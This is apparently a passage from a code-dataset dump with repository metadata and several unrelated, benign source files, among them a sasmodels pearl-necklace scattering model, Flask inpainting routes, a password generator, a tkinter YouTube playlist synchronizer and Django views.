[
"BSD-3-Clause"
] | null | null | null |
sasmodels/models/pearl_necklace.py
|
jmborr/sasmodels
|
bedb9b0fed4f3f4bc2bbfa5878de6f2b6fdfbcc9
|
[
"BSD-3-Clause"
] | 1
|
2021-04-28T14:21:17.000Z
|
2021-04-28T14:21:17.000Z
|
r"""
This model provides the form factor for a pearl necklace composed of two
elements: *N* pearls (homogeneous spheres of radius *R*) freely jointed by *M*
rods (like strings - with a total mass *Mw* = *M* \* *m*\ :sub:`r` + *N* \* *m*\
:sub:`s`, and the string segment length (or edge separation) *l*
(= *A* - 2\ *R*)). *A* is the center-to-center pearl separation distance.
.. figure:: img/pearl_necklace_geometry.jpg
Pearl Necklace schematic
Definition
----------
The output of the scattering intensity function for the pearl_necklace is
given by (Schweins, 2004)
.. math::
I(q)=\frac{ \text{scale} }{V} \cdot \frac{(S_{ss}(q)+S_{ff}(q)+S_{fs}(q))}
{(M \cdot m_f + N \cdot m_s)^2} + \text{bkg}
where
.. math::
S_{ss}(q) &= sm_s^2\psi^2(q)[\frac{N}{1-sin(qA)/qA}-\frac{N}{2}-
\frac{1-(sin(qA)/qA)^N}{(1-sin(qA)/qA)^2}\cdot\frac{sin(qA)}{qA}] \\
S_{ff}(q) &= sm_r^2[M\{2\Lambda(q)-(\frac{sin(ql/2)}{ql/2})\}+
\frac{2M\beta^2(q)}{1-sin(qA)/qA}-2\beta^2(q)\cdot
\frac{1-(sin(qA)/qA)^M}{(1-sin(qA)/qA)^2}] \\
S_{fs}(q) &= m_r \beta (q) \cdot m_s \psi (q) \cdot 4[
\frac{N-1}{1-sin(qA)/qA}-\frac{1-(sin(qA)/qA)^{N-1}}{(1-sin(qA)/qA)^2}
\cdot \frac{sin(qA)}{qA}] \\
\psi(q) &= 3 \cdot \frac{sin(qR)-(qR)\cdot cos(qR)}{(qR)^3} \\
\Lambda(q) &= \frac{\int_0^{ql}\frac{sin(t)}{t}dt}{ql} \\
\beta(q) &= \frac{\int_{qR}^{q(A-R)}\frac{sin(t)}{t}dt}{ql}
where the mass *m*\ :sub:`i` is (SLD\ :sub:`i` - SLD\ :sub:`solvent`) \*
(volume of the *N* pearls/rods). *V* is the total volume of the necklace.
The 2D scattering intensity is the same as $P(q)$ above, regardless of the
orientation of the *q* vector.
The returned value is scaled to units of |cm^-1| and the parameters of the
pearl_necklace model are the following
NB: *num_pearls* must be an integer.
References
----------
R Schweins and K Huber, *Particle Scattering Factor of Pearl Necklace Chains*,
*Macromol. Symp.* 211 (2004) 25-42 2004
"""
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
# ["name", "units", default, [lower, upper], "type","description"],
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False # use double precision unless told otherwise
def volume(radius, edge_sep, thick_string, num_pearls):
"""
Calculates the total particle volume of the necklace.
Redundant with form_volume.
"""
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
"""
Calculation for effective radius.
"""
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
# parameters for demo
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| 37.346154
| 80
| 0.612976
|
from numpy import inf, pi
name = "pearl_necklace"
title = "Colloidal spheres chained together with no preferential orientation"
description = """
Calculate form factor for Pearl Necklace Model
[Macromol. Symp. 2004, 211, 25-42]
Parameters:
background:background
scale: scale factor
sld: the SLD of the pearl spheres
sld_string: the SLD of the strings
sld_solvent: the SLD of the solvent
num_pearls: number of the pearls
radius: the radius of a pearl
edge_sep: the length of string segment; surface to surface
thick_string: thickness (ie, diameter) of the string
"""
category = "shape:cylinder"
parameters = [["radius", "Ang", 80.0, [0, inf], "volume",
"Mean radius of the chained spheres"],
["edge_sep", "Ang", 350.0, [0, inf], "volume",
"Mean separation of chained particles"],
["thick_string", "Ang", 2.5, [0, inf], "volume",
"Thickness of the chain linkage"],
["num_pearls", "none", 3, [1, inf], "volume",
"Number of pearls in the necklace (must be integer)"],
["sld", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chained spheres"],
["sld_string", "1e-6/Ang^2", 1.0, [-inf, inf], "sld",
"Scattering length density of the chain linkage"],
["sld_solvent", "1e-6/Ang^2", 6.3, [-inf, inf], "sld",
"Scattering length density of the solvent"],
]
source = ["lib/sas_Si.c", "lib/sas_3j1x_x.c", "pearl_necklace.c"]
single = False
def volume(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
number_of_strings = num_pearls - 1.0
string_vol = edge_sep * pi * pow((thick_string / 2.0), 2.0)
pearl_vol = 4.0 /3.0 * pi * pow(radius, 3.0)
total_vol = number_of_strings * string_vol
total_vol += num_pearls * pearl_vol
return total_vol
def ER(radius, edge_sep, thick_string, num_pearls):
num_pearls = int(num_pearls + 0.5)
tot_vol = volume(radius, edge_sep, thick_string, num_pearls)
rad_out = (tot_vol/(4.0/3.0*pi)) ** (1./3.)
return rad_out
demo = dict(scale=1, background=0, radius=80.0, edge_sep=350.0,
num_pearls=3, sld=1, sld_solvent=6.3, sld_string=1,
thick_string=2.5,
radius_pd=.2, radius_pd_n=5,
edge_sep_pd=25.0, edge_sep_pd_n=5,
num_pearls_pd=0, num_pearls_pd_n=0,
thick_string_pd=0.2, thick_string_pd_n=5,
)
tests = [[{}, 0.001, 17380.245], [{}, 'ER', 115.39502]]
| true
| true
|
f719129263fd17bc4e3b23fe0f051e771ce36bbd
| 1,835
|
py
|
Python
|
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
demo_site/routes.py
|
ArtemiiH/ppl_eraser_demo_site
|
42555a3c74abc434c1ad7ff62cddc822d0a35ce8
|
[
"MIT"
] | null | null | null |
import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| 33.363636
| 71
| 0.646866
|
import urllib
from io import BytesIO
import requests
from flask import (Blueprint, current_app, jsonify, make_response,
render_template, request)
from .helpers import prepare_image_for_json
bp = Blueprint('routes', __name__, url_prefix='')
@bp.route('/', methods=['GET'])
def home():
return render_template('home.html')
@bp.route('/inpaint', methods=['GET', 'POST'])
def inpaint():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/inpaint'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('inpaint.html')
@bp.route('/cut', methods=['GET', 'POST'])
def cut():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/cut'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('cut.html')
@bp.route('/mask', methods=['GET', 'POST'])
def mask():
if request.method == 'POST':
prepared_image = prepare_image_for_json(request.files['image'])
json = {'image': prepared_image}
url = current_app.config.get('INPAINT_API_URL') + 'api/mask'
api_response = requests.post(
url, json=json, timeout=60)
return make_response(jsonify(api_response.json()), 200)
elif request.method == 'GET':
return render_template('mask.html')
| true
| true
|
f719132b31b09ec071c7f06ba0c074e2c1965b39
| 560
|
py
|
Python
|
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
password generator.py
|
JoseRoberto1506/Password-generator
|
47045b6a2de4dd609874dfce0077e9e30ac5cade
|
[
"MIT"
] | null | null | null |
from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| 32.941176
| 68
| 0.666071
|
from string import ascii_letters, digits
from secrets import choice
lenght = int(input("Você deseja uma senha de quantos caracteres? "))
special_characters = "!#$%&()*+,-./:;<=>?@[\]_{|}."
characters = ascii_letters + special_characters + digits
while True:
password = ''.join(choice(characters) for i in range (lenght))
if (any(c.islower() for c in password) and
any(c.isupper() for c in password) and
any(c.isdigit() for c in password) and
any(sc in special_characters for sc in password)):
break
print(password)
| true
| true
|
f71913c1c96aa7dfd421ab759af0daac0e1f61ed
| 1,109
|
py
|
Python
|
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
mono2micro/ebc-application/ebc-data_dependencies/dynamic_dependencies/order_dependencies.py
|
jahn18/Normalized-TurboMQ
|
f44d85dca15d86a82e15b083072e05698135e479
|
[
"MIT"
] | null | null | null |
import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| 29.972973
| 83
| 0.680794
|
import csv
import sys
def orderEdges(fileName):
dynamic_dependencies_file = open(fileName)
csv_reader = csv.reader(dynamic_dependencies_file)
list_of_edges = []
for row in csv_reader:
list_of_edges.append(row[0].split())
sortedList = insertionSort(list_of_edges)
return sortedList
def writeCSV(sortedList, fileName):
with open(fileName, "w") as f:
writer = csv.writer(f)
writer.writerows(sortedList)
def insertionSort(list_of_values):
for i in range(len(list_of_values)):
j = findMin(i, list_of_values)
list_of_values[i], list_of_values[j] = list_of_values[j], list_of_values[i]
return list_of_values
def findMin(i, list_of_values):
smallest_value = int(list_of_values[i][2])
index = i
for j in range(i, len(list_of_values)):
if int(list_of_values[j][2]) < smallest_value:
index = j
smallest_value = int(list_of_values[j][2])
return index
if __name__ == "__main__":
fileName = sys.argv[1]
sortedList = orderEdges(fileName)
writeCSV(sortedList, 'sorted_edges.csv')
| true
| true
|
f719145474888494e028913c2c5ae60602cf70ac
| 1,826
|
py
|
Python
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 1
|
2022-03-30T22:39:15.000Z
|
2022-03-30T22:39:15.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 54
|
2016-03-25T17:25:01.000Z
|
2018-10-22T17:27:54.000Z
|
azure-mgmt-network/azure/mgmt/network/v2018_01_01/models/application_gateway_ssl_predefined_policy.py
|
JonathanGailliez/azure-sdk-for-python
|
f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b
|
[
"MIT"
] | 2
|
2017-01-20T18:25:46.000Z
|
2017-05-12T21:31:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
"""An Ssl predefined policy.
:param id: Resource ID.
:type id: str
:param name: Name of Ssl predefined policy.
:type name: str
:param cipher_suites: Ssl cipher suites to be enabled in the specified
order for application gateway.
:type cipher_suites: list[str or
~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslCipherSuite]
:param min_protocol_version: Minimum version of Ssl protocol to be
supported on application gateway. Possible values include: 'TLSv1_0',
'TLSv1_1', 'TLSv1_2'
:type min_protocol_version: str or
~azure.mgmt.network.v2018_01_01.models.ApplicationGatewaySslProtocol
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| 40.577778
| 88
| 0.64184
|
from .sub_resource import SubResource
class ApplicationGatewaySslPredefinedPolicy(SubResource):
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'cipher_suites': {'key': 'properties.cipherSuites', 'type': '[str]'},
'min_protocol_version': {'key': 'properties.minProtocolVersion', 'type': 'str'},
}
def __init__(self, **kwargs):
super(ApplicationGatewaySslPredefinedPolicy, self).__init__(**kwargs)
self.name = kwargs.get('name', None)
self.cipher_suites = kwargs.get('cipher_suites', None)
self.min_protocol_version = kwargs.get('min_protocol_version', None)
| true
| true
|
f71914c4aecc58a1fc572531f55a0757d52c5800
| 3,271
|
py
|
Python
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
entangledcognition/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | 1
|
2020-01-26T01:31:08.000Z
|
2020-01-26T01:31:08.000Z
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
entangledcognition/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | 1
|
2020-01-26T01:38:48.000Z
|
2020-01-26T01:38:48.000Z
|
youtube_synchronizer/interfaces/youtube-playlist-synchronizer.py
|
bharathmuppa/youtube-playlist-syncronizer
|
ff4bc8b0e49a2b51194405731dc3c4b5cf7b3ce8
|
[
"MIT"
] | null | null | null |
from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
# self.columnconfigure(1, weight=1)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
# img = Image.open("icon.png")
# img = img.resize((300, 300), Image.ANTIALIAS)
# ytpl = ImageTk.PhotoImage(img)
# area = Label(self, image=ytpl)
# area.image = ytpl
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| 37.170455
| 168
| 0.634668
|
from PIL import Image, ImageTk
from tkinter import Tk, Text, BOTH, W, N, E, S,filedialog,messagebox
from tkinter.ttk import Frame, Button, Label, Style, Progressbar
from youtube_synchronizer.utils import createFolderForPlaylist
from youtube_synchronizer.dataconnectors.youtube_login import loginToGoogle
class YoutubeFrame(Frame):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.master.title("Youtube Synchronizer")
self.pack(fill=BOTH, expand=True)
self.rowconfigure(3, weight=1)
self.rowconfigure(5, pad=1)
lbl = Label(self, text="Welcome to Youtube playlist Synchronizer")
lbl.grid(sticky=W, pady=4, padx=5)
bar = Progressbar(self, length=200, style='black.Horizontal.TProgressbar')
self.logArea = Text(self,state="disabled")
self.logArea.grid(row=1, column=0, columnspan=3, rowspan=4,
padx=5, sticky=E+W+S+N)
self.appendLog("Steps to follow \n")
self.appendLog("1) Select root directory \n ")
self.appendLog("2) Give permission for google to get playlist automatically \n")
self.appendLog("3) start syncing into your selected folder\n")
cbtn = Button(self, text="Choose Directory", command=lambda: self.chooseRootDirectory(cbtn))
cbtn.grid(row=5, column=0, pady=2)
hbtn = Button(self, text="Google Permission", command=lambda: self.clicked(hbtn))
hbtn.grid(row=5, column=1, padx=2)
obtn = Button(self, text="Start Sync", command=self.startSyncing)
obtn.grid(row=5, column=3)
def clicked(self,event):
googlePermissionUrl = loginToGoogle()
event.grid_forget()
label = Label(self, text="Google Permissions Granted")
label.grid(row=5, column=1, pady=2)
self.appendLog("Thanks for granting Google Permission")
def chooseRootDirectory(self,event):
self.rootDirectory = filedialog.askdirectory()
event.grid_forget()
label = Label(self, text=self.rootDirectory)
label.grid(row=5, column=0, pady=2)
self.appendLog("You have selected "+ self.rootDirectory +" as your root directory")
def appendLog(self,text):
self.logArea.configure(state='normal')
self.logArea.insert('end', text+'\n')
self.logArea.configure(state='disabled')
def startSyncing(self):
self.response = messagebox.askquestion("Confirmation", "you have selected: " + self.rootDirectory +
" as root Directory and youtube playlist will be added as sub folders inside " + self.rootDirectory + "/, are you sure?")
if self.response == 'yes':
createFolderForPlaylist(self.rootDirectory)
else:
self.appendLog("Playlist synchronized successfully")
def main():
root = Tk()
app = YoutubeFrame()
root.mainloop()
if __name__ == '__main__':
main()
| true
| true
|
f71914f55a893db82056922f6a48c469c030a16d
| 559
|
py
|
Python
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 497
|
2019-04-16T02:43:06.000Z
|
2022-03-13T10:26:12.000Z
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 103
|
2019-04-18T07:28:58.000Z
|
2021-12-22T08:45:16.000Z
|
libs/sync_bn/src/__init__.py
|
hx-Tang/GANet
|
8935c9d3d82189fa6f940c2a877534a398a041e4
|
[
"MIT"
] | 146
|
2019-04-22T13:39:41.000Z
|
2022-03-26T03:32:42.000Z
|
import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| 29.421053
| 50
| 0.695886
|
import os
import torch
from torch.utils.cpp_extension import load
cwd = os.path.dirname(os.path.realpath(__file__))
cpu_path = os.path.join(cwd, 'cpu')
gpu_path = os.path.join(cwd, 'gpu')
cpu = load('sync_bn_cpu', [
os.path.join(cpu_path, 'operator.cpp'),
os.path.join(cpu_path, 'sync_bn.cpp'),
], build_directory=cpu_path, verbose=False)
if torch.cuda.is_available():
gpu = load('sync_bn_gpu', [
os.path.join(gpu_path, 'operator.cpp'),
os.path.join(gpu_path, 'sync_bn_cuda.cu'),
], build_directory=gpu_path, verbose=False)
| true
| true
|
f719157c0ed0ea389406cf401792444090c08f94
| 725
|
py
|
Python
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 4
|
2018-03-01T10:22:30.000Z
|
2020-04-04T16:31:11.000Z
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 60
|
2018-05-20T04:42:32.000Z
|
2022-02-10T17:03:37.000Z
|
tests/utils/test_utils_django.py
|
bitcaster-io/bitcaster
|
9f1bad96e00e3bc78a22451731e231d30662b166
|
[
"BSD-3-Clause"
] | 1
|
2018-08-04T05:06:45.000Z
|
2018-08-04T05:06:45.000Z
|
from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| 30.208333
| 74
| 0.670345
|
from unittest import mock
from unittest.mock import Mock
from bitcaster.utils.django import (activator_factory,
deactivator_factory, toggler_factory,)
def test_toggler_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = toggler_factory('test')
assert func(Mock(), Mock(), Mock())
def test_activator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = activator_factory('test')
assert func(Mock(), Mock(), Mock())
def test_deactivator_factory():
with mock.patch('bitcaster.utils.django.get_connection'):
func = deactivator_factory('test')
assert func(Mock(), Mock(), Mock())
| true
| true
|
f719162b3d3e8d2a126762c598211bece33424a9
| 334
|
py
|
Python
|
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
experiments/jacobi-1d/tmp_files/4223.py
|
LoopTilingBenchmark/benchmark
|
52a3d2e70216552a498fd91de02a2fa9cb62122c
|
[
"BSD-2-Clause"
] | null | null | null |
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| 30.363636
| 118
| 0.763473
|
from chill import *
source('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/polybench/polybench-code/stencils/jacobi-1d/kernel.c')
destination('/uufs/chpc.utah.edu/common/home/u1142914/lib/ytopt_vinu/experiments/jacobi-1d/tmp_files/4223.c')
procedure('kernel_jacobi_1d')
loop(0)
known(' n > 2 ')
tile(0,2,8,2)
tile(1,2,8,2)
| true
| true
|
f71916c16a3387a714ba74da62f20782e4f9fe3d
| 7,539
|
py
|
Python
|
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | null | null | null |
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | 6
|
2022-02-16T06:08:43.000Z
|
2022-02-16T06:08:55.000Z
|
core/views.py
|
ICFL-UP/Yrden
|
88c421f1b391e9a6943455b05b8f397e9023187b
|
[
"MIT"
] | null | null | null |
import logging
import os
import json
import shutil
import threading
from typing import Any, List
from django.contrib.auth import login
from django.forms.models import BaseModelForm
from django.http.request import HttpRequest
from django.http.response import HttpResponse
from django.views.generic import ListView, DetailView, CreateView
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.urls import reverse_lazy
from django.views.generic.edit import DeleteView
from django.shortcuts import redirect, render
from django.urls import reverse
from django.utils import timezone
from datetime import datetime
from django.contrib.auth.mixins import LoginRequiredMixin
from core.utils import build_zip_json, create_venv, extract_zip, get_python_choices, write_log
from core.models import Plugin, PluginRun
from core.forms import NewUserForm, PluginFormSet, PluginSourceForm
from core.enums.log_type_enum import LogType
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-9s) %(message)s',)
def register_request(request: HttpRequest):
if request.method == "POST":
form = NewUserForm(request.POST)
if form.is_valid():
user = form.save()
login(request, user)
return redirect(reverse("core:index"))
form = NewUserForm()
return render(request=request, template_name="registration/register.html", context={"register_form":form})
